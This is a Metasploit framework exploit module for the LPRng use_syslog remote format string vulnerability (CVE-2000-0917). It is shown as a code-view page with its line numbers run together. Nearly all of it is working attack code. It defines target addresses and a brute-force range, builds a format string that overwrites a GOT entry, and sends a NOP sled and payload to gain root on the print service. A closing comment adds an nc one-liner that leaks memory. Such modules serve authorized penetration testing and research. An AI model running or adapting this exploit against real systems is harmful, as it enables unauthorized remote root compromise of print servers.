Path: blob/master/modules/exploits/linux/misc/lprng_format_string.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Brute10include Msf::Exploit::FormatString1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'LPRng use_syslog Remote Format String Vulnerability',17'Description' => %q{18This module exploits a format string vulnerability in the LPRng print server.19This vulnerability was discovered by Chris Evans. There was a publicly20circulating worm targeting this vulnerability, which prompted RedHat to pull21their 7.0 release. They consequently re-released it as "7.0-respin".22},23'Author' => [ 'jduck' ],24'License' => MSF_LICENSE,25'References' => [26[ 'CVE', '2000-0917' ],27[ 'OSVDB', '421' ],28[ 'BID', '1712' ],29[ 'US-CERT-VU', '382365' ],30[ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],31[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],32[ 'EDB', '226' ],33[ 'EDB', '227' ],34[ 'EDB', '230' ]35],36'Platform' => 'linux',37'Arch' => ARCH_X86,38'Privileged' => true, # root39'DefaultOptions' => {40'PrependSetresuid' => true41},42'Payload' => {43'Space' => 130, # buffer size on caldera is 180! (need ~50 for fmt)44'BadChars' => "\x00\x0a\x20\x25",45},46'Targets' => [47# tested OK - jjd48[49'Caldera OpenLinux 2.3 Bruteforce',50{51'Platform' => 'linux',52'NumPops' => 243,53'FlowHook' => 0x80992d4, # GOT of exit54# (0x809c180+(41+4+10+48)) - data segment, but gets corrupted55'Bruteforce' =>56{57'Start' => { 'Ret' => 0xcffffff4 },58'Stop' => { 'Ret' => 0x7fffe004 },59'Step' => 1660}61}62],63=begin64# untested (from public exploits)65[ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',66{67'NumPops' => 299,68'Ret' => 0xbffff640,69'FlowHook' => 0xbfffee3070}71],72[ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',73{74'NumPops' => 304,75'Ret' => 0xbffff920,76'FlowHook' => 0xbffff0f077}78],79[ 'RedHat 7.0 - Guinesss',80{81'NumPops' => 300,82'Ret' => 0x41424344,83'FlowHook' => 0xbffff3ec84}85],86[ 'RedHat 7.0 - Guinesss-dev',87{88'NumPops' => 300,89'Ret' => 0x41424344,90'FlowHook' => 0xbffff12c91}92],93=end94# ...95[96'Debug',97{98'NumPops' => 1, # sure to miss.99'Ret' => 0x41424344,100'FlowHook' => 0x45464748101}102]103],104# 'DefaultTarget' => 0,105'DisclosureDate' => '2000-09-25',106'Notes' => {107'Reliability' => UNKNOWN_RELIABILITY,108'Stability' => UNKNOWN_STABILITY,109'SideEffects' => UNKNOWN_SIDE_EFFECTS110}111)112)113114register_options([ Opt::RPORT(515) ])115end116117def exploit118# we want to use DPA for this one :)119fmtstr_set_caps(false, true)120121# check syslog to see which number hits 41414141122=begin123400.times { |x|124connect125buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]126sock.put(buf)127#handler128disconnect129}130=end131print_status("Trying target #{target.name} ..")132133super134end135136def brute_exploit(addrs)137# print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])138139printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ...140num_start = printed.length + 2 + 4141142# write 'ret' addr to flowhook (execute shellcode)143# NOTE: the resulting two writes must be done at the same time144145# characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)146fmtbuf = "_" * 4147fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])148# print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")149150# append payload and newline151# fmtbuf << payload.encoded152fmtbuf << "\x90" * 32153fmtbuf << Rex::Text.charset_exclude(payload_badchars)154fmtbuf << "\n"155156print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])157158connect159# print_status("Sleeping, attach now!!")160# select(nil,nil,nil,5)161162sock.put(fmtbuf)163164handler165disconnect166end167end168169=begin170171HRM!172173The following causes info leakage!174175bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC176177There are various other ways to trigger the vulnerability. LPD uses the single-byte commands1780x01 -> 0x09...179180It's unclear if there is a way to auto-detect the lpd version via LPD commands.181182=end183184185